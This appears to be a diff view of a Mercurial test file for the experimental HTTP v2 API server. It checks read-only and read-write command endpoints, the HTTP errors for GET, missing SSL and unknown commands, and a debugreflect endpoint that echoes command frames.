187 s> accept: application/mercurial-exp-framing-0001\r\n
187 s> accept: application/mercurial-exp-framing-0001\r\n
188 s> content-type: application/mercurial-exp-framing-0001\r\n
188 s> content-type: application/mercurial-exp-framing-0001\r\n
189 s> user-agent: test\r\n
189 s> user-agent: test\r\n
190 s> content-length: 18\r\n
190 s> content-length: 18\r\n
191 s> host: $LOCALIP:$HGPORT\r\n (glob)
191 s> host: $LOCALIP:$HGPORT\r\n (glob)
192 s> \r\n
192 s> \r\n
193 s> \x0e\x00\x00\x11customreadonly
193 s> \x0e\x00\x00\x11customreadonly
194 s> makefile('rb', None)
194 s> makefile('rb', None)
195 s> HTTP/1.1 200 OK\r\n
195 s> HTTP/1.1 200 OK\r\n
196 s> Server: testing stub value\r\n
196 s> Server: testing stub value\r\n
197 s> Date: $HTTP_DATE$\r\n
197 s> Date: $HTTP_DATE$\r\n
198 s> Content-Type: text/plain\r\n
198 s> Content-Type: text/plain\r\n
199 s> Content-Length: 18\r\n
199 s> Content-Length: 18\r\n
200 s> \r\n
200 s> \r\n
201 s> ro/customreadonly\n
201 s> ro/customreadonly\n
202
202
203 Request to read-write command fails because server is read-only by default
203 Request to read-write command fails because server is read-only by default
204
204
205 GET to read-write request yields 405
205 GET to read-write request yields 405
206
206
207 $ send << EOF
207 $ send << EOF
208 > httprequest GET api/$HTTPV2/rw/customreadonly
208 > httprequest GET api/$HTTPV2/rw/customreadonly
209 > user-agent: test
209 > user-agent: test
210 > EOF
210 > EOF
211 using raw connection to peer
211 using raw connection to peer
212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
213 s> Accept-Encoding: identity\r\n
213 s> Accept-Encoding: identity\r\n
214 s> user-agent: test\r\n
214 s> user-agent: test\r\n
215 s> host: $LOCALIP:$HGPORT\r\n (glob)
215 s> host: $LOCALIP:$HGPORT\r\n (glob)
216 s> \r\n
216 s> \r\n
217 s> makefile('rb', None)
217 s> makefile('rb', None)
218 s> HTTP/1.1 405 Method Not Allowed\r\n
218 s> HTTP/1.1 405 Method Not Allowed\r\n
219 s> Server: testing stub value\r\n
219 s> Server: testing stub value\r\n
220 s> Date: $HTTP_DATE$\r\n
220 s> Date: $HTTP_DATE$\r\n
221 s> Allow: POST\r\n
221 s> Allow: POST\r\n
222 s> Content-Length: 30\r\n
222 s> Content-Length: 30\r\n
223 s> \r\n
223 s> \r\n
224 s> commands require POST requests
224 s> commands require POST requests
225
225
226 Even for unknown commands
226 Even for unknown commands
227
227
228 $ send << EOF
228 $ send << EOF
229 > httprequest GET api/$HTTPV2/rw/badcommand
229 > httprequest GET api/$HTTPV2/rw/badcommand
230 > user-agent: test
230 > user-agent: test
231 > EOF
231 > EOF
232 using raw connection to peer
232 using raw connection to peer
233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
234 s> Accept-Encoding: identity\r\n
234 s> Accept-Encoding: identity\r\n
235 s> user-agent: test\r\n
235 s> user-agent: test\r\n
236 s> host: $LOCALIP:$HGPORT\r\n (glob)
236 s> host: $LOCALIP:$HGPORT\r\n (glob)
237 s> \r\n
237 s> \r\n
238 s> makefile('rb', None)
238 s> makefile('rb', None)
239 s> HTTP/1.1 405 Method Not Allowed\r\n
239 s> HTTP/1.1 405 Method Not Allowed\r\n
240 s> Server: testing stub value\r\n
240 s> Server: testing stub value\r\n
241 s> Date: $HTTP_DATE$\r\n
241 s> Date: $HTTP_DATE$\r\n
242 s> Allow: POST\r\n
242 s> Allow: POST\r\n
243 s> Content-Length: 30\r\n
243 s> Content-Length: 30\r\n
244 s> \r\n
244 s> \r\n
245 s> commands require POST requests
245 s> commands require POST requests
246
246
247 SSL required by default
247 SSL required by default
248
248
249 $ send << EOF
249 $ send << EOF
250 > httprequest POST api/$HTTPV2/rw/customreadonly
250 > httprequest POST api/$HTTPV2/rw/customreadonly
251 > user-agent: test
251 > user-agent: test
252 > EOF
252 > EOF
253 using raw connection to peer
253 using raw connection to peer
254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
255 s> Accept-Encoding: identity\r\n
255 s> Accept-Encoding: identity\r\n
256 s> user-agent: test\r\n
256 s> user-agent: test\r\n
257 s> host: $LOCALIP:$HGPORT\r\n (glob)
257 s> host: $LOCALIP:$HGPORT\r\n (glob)
258 s> \r\n
258 s> \r\n
259 s> makefile('rb', None)
259 s> makefile('rb', None)
260 s> HTTP/1.1 403 ssl required\r\n
260 s> HTTP/1.1 403 ssl required\r\n
261 s> Server: testing stub value\r\n
261 s> Server: testing stub value\r\n
262 s> Date: $HTTP_DATE$\r\n
262 s> Date: $HTTP_DATE$\r\n
263 s> Content-Length: 17\r\n
263 s> Content-Length: 17\r\n
264 s> \r\n
264 s> \r\n
265 s> permission denied
265 s> permission denied
266
266
267 Restart server to allow non-ssl read-write operations
267 Restart server to allow non-ssl read-write operations
268
268
269 $ killdaemons.py
269 $ killdaemons.py
270 $ cat > server/.hg/hgrc << EOF
270 $ cat > server/.hg/hgrc << EOF
271 > [experimental]
271 > [experimental]
272 > web.apiserver = true
272 > web.apiserver = true
273 > web.api.http-v2 = true
273 > web.api.http-v2 = true
274 > [web]
274 > [web]
275 > push_ssl = false
275 > push_ssl = false
276 > allow-push = *
276 > allow-push = *
277 > EOF
277 > EOF
278
278
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
280 $ cat hg.pid > $DAEMON_PIDS
280 $ cat hg.pid > $DAEMON_PIDS
281
281
282 Authorized request for valid read-write command works
282 Authorized request for valid read-write command works
283
283
284 $ send << EOF
284 $ send << EOF
285 > httprequest POST api/$HTTPV2/rw/customreadonly
285 > httprequest POST api/$HTTPV2/rw/customreadonly
286 > user-agent: test
286 > user-agent: test
287 > accept: $MEDIATYPE
287 > accept: $MEDIATYPE
288 > content-type: $MEDIATYPE
288 > content-type: $MEDIATYPE
289 > frame command-name eos customreadonly
289 > frame command-name eos customreadonly
290 > EOF
290 > EOF
291 using raw connection to peer
291 using raw connection to peer
292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
293 s> Accept-Encoding: identity\r\n
293 s> Accept-Encoding: identity\r\n
294 s> accept: application/mercurial-exp-framing-0001\r\n
294 s> accept: application/mercurial-exp-framing-0001\r\n
295 s> content-type: application/mercurial-exp-framing-0001\r\n
295 s> content-type: application/mercurial-exp-framing-0001\r\n
296 s> user-agent: test\r\n
296 s> user-agent: test\r\n
297 s> content-length: 18\r\n
297 s> content-length: 18\r\n
298 s> host: $LOCALIP:$HGPORT\r\n (glob)
298 s> host: $LOCALIP:$HGPORT\r\n (glob)
299 s> \r\n
299 s> \r\n
300 s> \x0e\x00\x00\x11customreadonly
300 s> \x0e\x00\x00\x11customreadonly
301 s> makefile('rb', None)
301 s> makefile('rb', None)
302 s> HTTP/1.1 200 OK\r\n
302 s> HTTP/1.1 200 OK\r\n
303 s> Server: testing stub value\r\n
303 s> Server: testing stub value\r\n
304 s> Date: $HTTP_DATE$\r\n
304 s> Date: $HTTP_DATE$\r\n
305 s> Content-Type: text/plain\r\n
305 s> Content-Type: text/plain\r\n
306 s> Content-Length: 18\r\n
306 s> Content-Length: 18\r\n
307 s> \r\n
307 s> \r\n
308 s> rw/customreadonly\n
308 s> rw/customreadonly\n
309
309
310 Authorized request for unknown command is rejected
310 Authorized request for unknown command is rejected
311
311
312 $ send << EOF
312 $ send << EOF
313 > httprequest POST api/$HTTPV2/rw/badcommand
313 > httprequest POST api/$HTTPV2/rw/badcommand
314 > user-agent: test
314 > user-agent: test
315 > accept: $MEDIATYPE
315 > accept: $MEDIATYPE
316 > EOF
316 > EOF
317 using raw connection to peer
317 using raw connection to peer
318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
319 s> Accept-Encoding: identity\r\n
319 s> Accept-Encoding: identity\r\n
320 s> accept: application/mercurial-exp-framing-0001\r\n
320 s> accept: application/mercurial-exp-framing-0001\r\n
321 s> user-agent: test\r\n
321 s> user-agent: test\r\n
322 s> host: $LOCALIP:$HGPORT\r\n (glob)
322 s> host: $LOCALIP:$HGPORT\r\n (glob)
323 s> \r\n
323 s> \r\n
324 s> makefile('rb', None)
324 s> makefile('rb', None)
325 s> HTTP/1.1 404 Not Found\r\n
325 s> HTTP/1.1 404 Not Found\r\n
326 s> Server: testing stub value\r\n
326 s> Server: testing stub value\r\n
327 s> Date: $HTTP_DATE$\r\n
327 s> Date: $HTTP_DATE$\r\n
328 s> Content-Type: text/plain\r\n
328 s> Content-Type: text/plain\r\n
329 s> Content-Length: 42\r\n
329 s> Content-Length: 42\r\n
330 s> \r\n
330 s> \r\n
331 s> unknown wire protocol command: badcommand\n
331 s> unknown wire protocol command: badcommand\n
332
333 debugreflect isn't enabled by default
334
335 $ send << EOF
336 > httprequest POST api/$HTTPV2/ro/debugreflect
337 > user-agent: test
338 > EOF
339 using raw connection to peer
340 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
341 s> Accept-Encoding: identity\r\n
342 s> user-agent: test\r\n
343 s> host: $LOCALIP:$HGPORT\r\n (glob)
344 s> \r\n
345 s> makefile('rb', None)
346 s> HTTP/1.1 404 Not Found\r\n
347 s> Server: testing stub value\r\n
348 s> Date: $HTTP_DATE$\r\n
349 s> Content-Type: text/plain\r\n
350 s> Content-Length: 34\r\n
351 s> \r\n
352 s> debugreflect service not available
353
354 Restart server to get debugreflect endpoint
355
356 $ killdaemons.py
357 $ cat > server/.hg/hgrc << EOF
358 > [experimental]
359 > web.apiserver = true
360 > web.api.debugreflect = true
361 > web.api.http-v2 = true
362 > [web]
363 > push_ssl = false
364 > allow-push = *
365 > EOF
366
367 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
368 $ cat hg.pid > $DAEMON_PIDS
369
370 Command frames can be reflected via debugreflect
371
372 $ send << EOF
373 > httprequest POST api/$HTTPV2/ro/debugreflect
374 > accept: $MEDIATYPE
375 > content-type: $MEDIATYPE
376 > user-agent: test
377 > frame command-name have-args command1
378 > frame command-argument 0 \x03\x00\x04\x00fooval1
379 > frame command-argument eoa \x04\x00\x03\x00bar1val
380 > EOF
381 using raw connection to peer
382 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
383 s> Accept-Encoding: identity\r\n
384 s> accept: application/mercurial-exp-framing-0001\r\n
385 s> content-type: application/mercurial-exp-framing-0001\r\n
386 s> user-agent: test\r\n
387 s> content-length: 42\r\n
388 s> host: $LOCALIP:$HGPORT\r\n (glob)
389 s> \r\n
390 s> \x08\x00\x00\x12command1\x0b\x00\x00 \x03\x00\x04\x00fooval1\x0b\x00\x00"\x04\x00\x03\x00bar1val
391 s> makefile('rb', None)
392 s> HTTP/1.1 200 OK\r\n
393 s> Server: testing stub value\r\n
394 s> Date: $HTTP_DATE$\r\n
395 s> Content-Type: text/plain\r\n
396 s> Content-Length: 291\r\n
397 s> \r\n
398 s> received: 1 2 command1\n
399 s> ["wantframe", {"state": "command-receiving-args"}]\n
400 s> received: 2 0 \x03\x00\x04\x00fooval1\n
401 s> ["wantframe", {"state": "command-receiving-args"}]\n
402 s> received: 2 2 \x04\x00\x03\x00bar1val\n
403 s> ["runcommand", {"args": {"bar1": "val", "foo": "val1"}, "command": "command1", "data": null}]\n
404 s> received: <no frame>
405
406 $ cat error.log
General Comments 0
You need to be logged in to leave comments. Login now